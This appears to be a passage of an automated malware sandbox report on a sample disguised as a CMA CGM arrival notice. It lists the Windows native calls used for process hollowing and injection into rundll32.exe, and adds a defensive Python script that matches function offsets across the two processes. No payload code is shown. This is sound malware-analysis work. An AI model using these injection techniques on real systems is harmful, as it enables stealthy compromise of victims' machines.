Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CF96 14_2_0081CF96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00802FB0 14_2_00802FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: String function: 1E60B150 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0486B150 appears 32 times
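The two string-function hits above sit at the same offset, 0xB150, from two different bases: 0x1E600000 in the sample's own process (12) and 0x04860000 in rundll32.exe (14). The ten process-12 / process-14 pairs listed under "Detected potential crypto function" line up the same way (1E626E30 vs 0486 6E30 and so on). Identical function offsets at different bases are the relocation-invariant fingerprint of one code image mapped into two processes, which is what the hollowing and injection verdicts elsewhere in this report predict. The script below is an added triage example, not part of the Joe Sandbox report: it parses "Code function" lines in the format used here, clusters each process's addresses into regions, infers a 64 KiB-aligned base per region, and reports region pairs in different processes whose function offsets coincide. The sample lines are copied from this report's process 12 and process 14 entries; the 1 MiB clustering gap, the 64 KiB base alignment and the minimum of five shared offsets are assumptions of the example.

```python
import re
from collections import defaultdict

# Constructed input: "Code function" evidence lines copied from this report for
# process 12 (the sample itself) and process 14 (the hollowed rundll32.exe).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E626E30 12_2_1E626E30
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63EBB0 12_2_1E63EBB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6C1002 12_2_1E6C1002
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61841F 12_2_1E61841F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61B090 12_2_1E61B090
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D1D55 12_2_1E6D1D55
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E600D20 12_2_1E600D20
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E624120 12_2_1E624120
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60F900 12_2_1E60F900
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61D5E0 12_2_1E61D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B090 14_2_0487B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921002 14_2_04921002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487841F 14_2_0487841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487D5E0 14_2_0487D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486F900 14_2_0486F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04860D20 14_2_04860D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04931D55 14_2_04931D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04886E30 14_2_04886E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489EBB0 14_2_0489EBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00802D88 14_2_00802D88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00802D90 14_2_00802D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00809E30 14_2_00809E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CF93 14_2_0081CF93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CF96 14_2_0081CF96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00802FB0 14_2_00802FB0
""".strip().splitlines()

REGION_GAP = 0x100000  # assumption: a gap of more than 1 MiB starts a new region
BASE_ALIGN = 0x10000   # Windows maps images at 64 KiB-aligned bases

# Joe Sandbox token: <process index>_2_<8 hex digits>; each line repeats it twice.
ADDR_RE = re.compile(r"\b(\d+)_2_([0-9A-Fa-f]{8})\b")


def parse_functions(lines):
    """Map each process index to the sorted, de-duplicated function start addresses."""
    funcs = defaultdict(set)
    for line in lines:
        for pid, addr in ADDR_RE.findall(line):
            funcs[int(pid)].add(int(addr, 16))
    return {pid: sorted(addrs) for pid, addrs in funcs.items()}


def region_offsets(addrs):
    """Cluster sorted addresses into regions and express each as (base, frozenset(offsets))."""
    regions, current = [], []
    for addr in addrs:
        if current and addr - current[-1] > REGION_GAP:
            regions.append(current)
            current = []
        current.append(addr)
    if current:
        regions.append(current)
    result = []
    for region in regions:
        base = region[0] & ~(BASE_ALIGN - 1)  # heuristic: round the lowest function down
        result.append((base, frozenset(a - base for a in region)))
    return result


def find_shared_images(funcs, min_common=5):
    """Return region pairs in different processes whose function offsets coincide.

    Identical offsets at different bases mean the same code image is mapped in both
    processes, the expected aftermath of process hollowing or thread injection.
    """
    regions = [(pid, base, offs)
               for pid, addrs in funcs.items()
               for base, offs in region_offsets(addrs)]
    hits = []
    for i, (pid_a, base_a, offs_a) in enumerate(regions):
        for pid_b, base_b, offs_b in regions[i + 1:]:
            if pid_a == pid_b:
                continue
            common = offs_a & offs_b
            if len(common) >= min_common:
                hits.append({"pids": (pid_a, pid_b),
                             "bases": (base_a, base_b),
                             "common": sorted(common)})
    return hits


def rebase(addr, base_from, base_to):
    """Translate an address from one mapping of the image to the other."""
    return addr - base_from + base_to


if __name__ == "__main__":
    for hit in find_shared_images(parse_functions(REPORT_LINES)):
        a, b = hit["pids"]
        print(f"process {a} @ {hit['bases'][0]:#010x} and process {b} @ {hit['bases'][1]:#010x} "
              f"share {len(hit['common'])} function offsets: "
              + ", ".join(f"{o:#x}" for o in hit["common"]))
    # The string routine from the two entries above is one function seen twice:
    print(f"{rebase(0x1E60B150, 0x1E600000, 0x04860000):#010x}")  # prints 0x0486b150
```

Run as a script it reports one match: the region at 0x1E600000 in process 12 and the region at 0x04860000 in process 14 share all ten listed offsets. The inferred base is only a heuristic; it needs the lowest listed function to fall in the same 64 KiB page relative to the image in both processes, and it does not recover the true image base or identify the image. The second rundll32.exe region at 0x00800000 has no counterpart among the process-12 functions shown here, but it is the same 0x800000 memory of process 0000000E (hexadecimal for 14) in which the Formbook memory rules above matched, so the two findings describe the same injected payload.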
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078F4F6 NtWriteVirtualMemory,LoadLibraryA, 0_2_0078F4F6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B52A NtAllocateVirtualMemory, 0_2_0078B52A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00793504 LoadLibraryA,NtSetContextThread, 0_2_00793504
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875D7 NtWriteVirtualMemory,LoadLibraryA, 0_2_007875D7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A83B NtWriteVirtualMemory,LoadLibraryA, 0_2_0078A83B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00792D4E NtProtectVirtualMemory, 0_2_00792D4E
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078907D NtWriteVirtualMemory, 0_2_0078907D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A058 NtWriteVirtualMemory, 0_2_0078A058
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A03A NtWriteVirtualMemory, 0_2_0078A03A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A0D4 NtWriteVirtualMemory, 0_2_0078A0D4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007890CD NtWriteVirtualMemory, 0_2_007890CD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789144 NtWriteVirtualMemory, 0_2_00789144
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A135 NtWriteVirtualMemory, 0_2_0078A135
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A1B4 NtWriteVirtualMemory, 0_2_0078A1B4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A27C NtWriteVirtualMemory, 0_2_0078A27C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A250 NtWriteVirtualMemory, 0_2_0078A250
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789214 NtWriteVirtualMemory, 0_2_00789214
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892D0 NtWriteVirtualMemory, 0_2_007892D0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892B8 NtWriteVirtualMemory, 0_2_007892B8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892B4 NtWriteVirtualMemory, 0_2_007892B4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789295 NtWriteVirtualMemory, 0_2_00789295
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A364 NtWriteVirtualMemory, 0_2_0078A364
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789339 NtWriteVirtualMemory, 0_2_00789339
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007893A8 NtWriteVirtualMemory, 0_2_007893A8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789431 NtWriteVirtualMemory, 0_2_00789431
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007894B9 NtWriteVirtualMemory, 0_2_007894B9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B491 NtAllocateVirtualMemory, 0_2_0078B491
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789560 NtWriteVirtualMemory, 0_2_00789560
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789537 NtWriteVirtualMemory, 0_2_00789537
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B5BC NtAllocateVirtualMemory, 0_2_0078B5BC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789668 NtWriteVirtualMemory, 0_2_00789668
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B628 NtAllocateVirtualMemory, 0_2_0078B628
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007896E9 NtWriteVirtualMemory, 0_2_007896E9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B6A0 NtAllocateVirtualMemory, 0_2_0078B6A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B71C NtAllocateVirtualMemory, 0_2_0078B71C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B789 NtAllocateVirtualMemory, 0_2_0078B789
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789783 NtWriteVirtualMemory, 0_2_00789783
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078185B NtWriteVirtualMemory, 0_2_0078185B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789829 NtWriteVirtualMemory, 0_2_00789829
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007898A0 NtWriteVirtualMemory, 0_2_007898A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078991F NtWriteVirtualMemory, 0_2_0078991F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078990D NtWriteVirtualMemory, 0_2_0078990D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007889FB NtWriteVirtualMemory, 0_2_007889FB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007899BC NtWriteVirtualMemory, 0_2_007899BC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007889AC NtWriteVirtualMemory, 0_2_007889AC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788A7C NtWriteVirtualMemory, 0_2_00788A7C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789A21 NtWriteVirtualMemory, 0_2_00789A21
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788AE1 NtWriteVirtualMemory, 0_2_00788AE1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789AC7 NtWriteVirtualMemory, 0_2_00789AC7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789A94 NtWriteVirtualMemory, 0_2_00789A94
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789B7C NtWriteVirtualMemory, 0_2_00789B7C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788B54 NtWriteVirtualMemory, 0_2_00788B54
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789B14 NtWriteVirtualMemory, 0_2_00789B14
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789BF8 NtWriteVirtualMemory, 0_2_00789BF8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789C60 NtWriteVirtualMemory, 0_2_00789C60
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788C45 NtWriteVirtualMemory, 0_2_00788C45
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788CB8 NtWriteVirtualMemory, 0_2_00788CB8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789CA0 NtWriteVirtualMemory, 0_2_00789CA0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BD69 NtWriteVirtualMemory,LoadLibraryA, 0_2_0078BD69
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789D49 NtWriteVirtualMemory, 0_2_00789D49
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788D40 NtWriteVirtualMemory, 0_2_00788D40
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078DD10 NtWriteVirtualMemory, 0_2_0078DD10
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789DCC NtWriteVirtualMemory, 0_2_00789DCC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788DAD NtWriteVirtualMemory, 0_2_00788DAD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789E69 NtWriteVirtualMemory, 0_2_00789E69
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788E29 NtWriteVirtualMemory, 0_2_00788E29
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789E00 NtWriteVirtualMemory, 0_2_00789E00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785EAC NtWriteVirtualMemory,LoadLibraryA, 0_2_00785EAC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788EA0 NtWriteVirtualMemory, 0_2_00788EA0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788F7D NtWriteVirtualMemory, 0_2_00788F7D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789F54 NtWriteVirtualMemory, 0_2_00789F54
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788F11 NtWriteVirtualMemory, 0_2_00788F11
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789FF4 NtWriteVirtualMemory, 0_2_00789FF4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789FAA NtWriteVirtualMemory, 0_2_00789FAA
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649660 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_1E649660
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A50 NtCreateFile,LdrInitializeThunk, 12_2_1E649A50
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A20 NtResumeThread,LdrInitializeThunk, 12_2_1E649A20
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A00 NtProtectVirtualMemory,LdrInitializeThunk, 12_2_1E649A00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6496E0 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_1E6496E0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649710 NtQueryInformationToken,LdrInitializeThunk, 12_2_1E649710
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6497A0 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_1E6497A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649780 NtMapViewOfSection,LdrInitializeThunk, 12_2_1E649780
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649860 NtQuerySystemInformation,LdrInitializeThunk, 12_2_1E649860
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649840 NtDelayExecution,LdrInitializeThunk, 12_2_1E649840
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6498F0 NtReadVirtualMemory,LdrInitializeThunk, 12_2_1E6498F0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649540 NtReadFile,LdrInitializeThunk, 12_2_1E649540
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649910 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_1E649910
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6499A0 NtCreateSection,LdrInitializeThunk, 12_2_1E6499A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649670 NtQueryInformationProcess, 12_2_1E649670
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649650 NtQueryValueKey, 12_2_1E649650
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649610 NtEnumerateValueKey, 12_2_1E649610
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A10 NtQuerySection, 12_2_1E649A10
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6496D0 NtCreateKey, 12_2_1E6496D0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A80 NtOpenDirectoryObject, 12_2_1E649A80
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649760 NtOpenProcess, 12_2_1E649760
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649770 NtSetInformationFile, 12_2_1E649770
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64A770 NtOpenThread, 12_2_1E64A770
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649730 NtQueryVirtualMemory, 12_2_1E649730
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649B00 NtSetValueKey, 12_2_1E649B00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64A710 NtOpenProcessToken, 12_2_1E64A710
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649FE0 NtCreateMutant, 12_2_1E649FE0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64A3B0 NtGetContextThread, 12_2_1E64A3B0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64B040 NtSuspendThread, 12_2_1E64B040
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649820 NtEnumerateKey, 12_2_1E649820
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6498A0 NtWriteVirtualMemory, 12_2_1E6498A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649560 NtWriteFile, 12_2_1E649560
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649950 NtQueueApcThread, 12_2_1E649950
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649520 NtWaitForSingleObject, 12_2_1E649520
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64AD30 NtSetContextThread, 12_2_1E64AD30
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6495F0 NtQueryInformationFile, 12_2_1E6495F0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6499D0 NtCreateProcessEx, 12_2_1E6499D0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6495D0 NtClose, 12_2_1E6495D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9840 NtDelayExecution,LdrInitializeThunk, 14_2_048A9840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_048A9860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A99A0 NtCreateSection,LdrInitializeThunk, 14_2_048A99A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A95D0 NtClose,LdrInitializeThunk, 14_2_048A95D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_048A9910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9540 NtReadFile,LdrInitializeThunk, 14_2_048A9540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A96D0 NtCreateKey,LdrInitializeThunk, 14_2_048A96D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_048A96E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9650 NtQueryValueKey,LdrInitializeThunk, 14_2_048A9650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A50 NtCreateFile,LdrInitializeThunk, 14_2_048A9A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_048A9660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9780 NtMapViewOfSection,LdrInitializeThunk, 14_2_048A9780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9FE0 NtCreateMutant,LdrInitializeThunk, 14_2_048A9FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9710 NtQueryInformationToken,LdrInitializeThunk, 14_2_048A9710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A98A0 NtWriteVirtualMemory, 14_2_048A98A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A98F0 NtReadVirtualMemory, 14_2_048A98F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9820 NtEnumerateKey, 14_2_048A9820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AB040 NtSuspendThread, 14_2_048AB040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A99D0 NtCreateProcessEx, 14_2_048A99D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A95F0 NtQueryInformationFile, 14_2_048A95F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9520 NtWaitForSingleObject, 14_2_048A9520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AAD30 NtSetContextThread, 14_2_048AAD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9950 NtQueueApcThread, 14_2_048A9950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9560 NtWriteFile, 14_2_048A9560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A80 NtOpenDirectoryObject, 14_2_048A9A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A00 NtProtectVirtualMemory, 14_2_048A9A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9610 NtEnumerateValueKey, 14_2_048A9610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A10 NtQuerySection, 14_2_048A9A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A20 NtResumeThread, 14_2_048A9A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9670 NtQueryInformationProcess, 14_2_048A9670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A97A0 NtUnmapViewOfSection, 14_2_048A97A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AA3B0 NtGetContextThread, 14_2_048AA3B0
